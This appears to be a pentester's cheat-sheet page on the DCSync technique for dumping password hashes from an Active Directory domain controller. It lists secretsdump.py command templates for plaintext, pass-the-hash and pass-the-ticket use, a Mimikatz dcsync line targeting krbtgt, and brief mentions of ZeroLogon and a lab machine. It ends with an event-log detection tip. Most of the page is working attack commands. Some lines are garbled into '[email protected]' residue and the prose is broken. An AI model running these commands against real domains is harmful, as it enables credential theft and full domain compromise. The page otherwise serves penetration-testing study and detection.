DCSync
MITRE ATT&CK T1003.006
Dump Password Hashes from Domain Controller
It is a credential dumping techniques, adversary to simulate the replication process of a Domain Controllers to ask other DC to replicate information using the MS-DRSR. It cannot disabled as MS-DRSR is a necessary servers of a AD.
This attack requires domain admin privileges (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All) Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have this privileges by default.
Get-ObjectAcl -DistinguishedName "dc=dc1,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'ds-replication-get-changes')
# using a plaintext password
secretsdump.py -outputfile 'file.name' 'User'/'domain':'PASSWORD'@'Domain Controller IP'
secretsdump.py -just-dc administrator/fkclai-win2016\[email protected]
# with Pass-the-Hash
secretsdump.py -outputfile 'file.name' -hashes 'LMhash':'NThash' 'User'/'domain'@'Domain Controller IP'
# with Pass-the-Ticket
secretsdump.py -k -outputfile 'file.name' 'User'/'domain'@'Domain Controller IP'

ZeroLogon Exploit
[email protected]
Secrets Dump

Sauna 10.10.10.175
[email protected]
Pass-the-Hash Attack
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dc01\krbtgt"'

Monitor Windows Event Log 4662 to detect the String: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 or 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 or 89e95b76-444d-4c62-991a-0facbeda640c
Last modified 3mo ago